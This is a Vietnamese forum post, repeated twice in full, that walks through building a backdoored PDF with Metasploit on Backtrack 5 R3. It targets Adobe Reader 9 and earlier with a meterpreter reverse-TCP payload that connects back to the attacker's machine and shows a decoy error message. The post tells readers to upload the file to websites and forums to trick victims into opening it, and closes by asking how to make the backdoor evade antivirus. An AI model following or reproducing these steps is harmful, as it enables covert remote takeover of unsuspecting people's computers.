lelelov3
W-------
-
11/03/2015
-
4
-
33 bài viết
Nhúng một backdoor vào file PDF với backtrack 5 R3
Chào các bạn, Abode reader là phần mềm đọc sách phổ biến nhất, và các file PDF cũng có tỷ lệ download vào loại cao nhất. Hôm nay, mình sẽ hướng dẫn các bạn nhúng một backdoor vào file PDF với backtrack 5 R3, khai thác lỗi của Abode reader 9 hay đời sớm hơn.
Theo nhà sản xuất phần mềm diệt virus Avast, 60% máy tính cài phần mềm Abode reader 9 hay đời sớm hơn.
Bước 1: tìm exploit thích hợp
+ Mở console Backtrack 5 R3 gõ lệnh sau để vào metasploit:
root@bt:~# msfconsole
+ Sau khi vào metasploit, tìm kiếm metasploit để tìm lỗi liên quan đến abode reader:
msf > search type:exploit platform:windows adobe pdf
+ Sau đó sử dụng exploit sau:
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Bước 2 :Thiết lập payload:
msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Bước 3: Thiết lập các options:
+ Check options để xem những thứ cần thiết cho exploit này bằng lệnh sau
msf > exploit (adobe_pdf_embedded_exe) > show options
+ Giả sử ta có 1 file PDF ban đầu chưa bị infect trên desktop của Backtrack, có tên là book.pdf ta thiết lập file đầu vào như sau:
msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME /root/Desktop/book.pdf
Chú ý: File PDF này phải được tạo từ Abode reader 9 hay đời sớm hơn
+ Sau đó, thiết lập tên file sẽ nhúng backdoor( giả sử đặt tên là handbook.pdf)
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME handbook.pdf
+ Thiết lập thông điệp khi mở file:
msf > exploit (adobe_pdf_embedded_exe) > set LAUNCH_MESSAGE Sorry, can not open this file!!!
+ Thiết lập LHOST( Ip của máy tính tấn công):
msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1
Bước 4: Exploit
+ Gõ lệnh exploit:
msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit đã tạo 1 file PDF tên handbook.pdf cái chứa metasploit listener( cái lắng nghe). Metasploit đặt file này tại:
/root/.msf4/local/handbook.pdf
Bây giờ, đơn giản ta copy file PDF này up lên các website, forum và dụ khách ghé thăm download về máy của họ. Khi nạn nhân download và mở file, nó sẽ mở một kết nối tới máy tính tấn công, và bị hacker kiểm soát
Việc nhúng backdoor vào file PDF có thể làm với đời Backtrack sau này là Kali Linux
Bài hướng dẫn của mình xin kết thúc ở đây, chúc các bạn vui vẻ và thực hành tốt
Câu hỏi thảo luận: Bằng cách nào sử dụng các công cụ như Backtrack hay Kali linux để làm backdoor này FUD 100% để có thể vượt qua phần mềm diệt virus trên máy tính nạn nhân. Mong nhận được hồi âm của các bạn!
Theo nhà sản xuất phần mềm diệt virus Avast, 60% máy tính cài phần mềm Abode reader 9 hay đời sớm hơn.
Bước 1: tìm exploit thích hợp
+ Mở console Backtrack 5 R3 gõ lệnh sau để vào metasploit:
root@bt:~# msfconsole
+ Sau khi vào metasploit, tìm kiếm metasploit để tìm lỗi liên quan đến abode reader:
msf > search type:exploit platform:windows adobe pdf
+ Sau đó sử dụng exploit sau:
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Bước 2 :Thiết lập payload:
msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Bước 3: Thiết lập các options:
+ Check options để xem những thứ cần thiết cho exploit này bằng lệnh sau
msf > exploit (adobe_pdf_embedded_exe) > show options
+ Giả sử ta có 1 file PDF ban đầu chưa bị infect trên desktop của Backtrack, có tên là book.pdf ta thiết lập file đầu vào như sau:
msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME /root/Desktop/book.pdf
Chú ý: File PDF này phải được tạo từ Abode reader 9 hay đời sớm hơn
+ Sau đó, thiết lập tên file sẽ nhúng backdoor( giả sử đặt tên là handbook.pdf)
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME handbook.pdf
+ Thiết lập thông điệp khi mở file:
msf > exploit (adobe_pdf_embedded_exe) > set LAUNCH_MESSAGE Sorry, can not open this file!!!
+ Thiết lập LHOST( Ip của máy tính tấn công):
msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1
Bước 4: Exploit
+ Gõ lệnh exploit:
msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit đã tạo 1 file PDF tên handbook.pdf cái chứa metasploit listener( cái lắng nghe). Metasploit đặt file này tại:
/root/.msf4/local/handbook.pdf
Bây giờ, đơn giản ta copy file PDF này up lên các website, forum và dụ khách ghé thăm download về máy của họ. Khi nạn nhân download và mở file, nó sẽ mở một kết nối tới máy tính tấn công, và bị hacker kiểm soát
Việc nhúng backdoor vào file PDF có thể làm với đời Backtrack sau này là Kali Linux
Bài hướng dẫn của mình xin kết thúc ở đây, chúc các bạn vui vẻ và thực hành tốt
Câu hỏi thảo luận: Bằng cách nào sử dụng các công cụ như Backtrack hay Kali linux để làm backdoor này FUD 100% để có thể vượt qua phần mềm diệt virus trên máy tính nạn nhân. Mong nhận được hồi âm của các bạn!
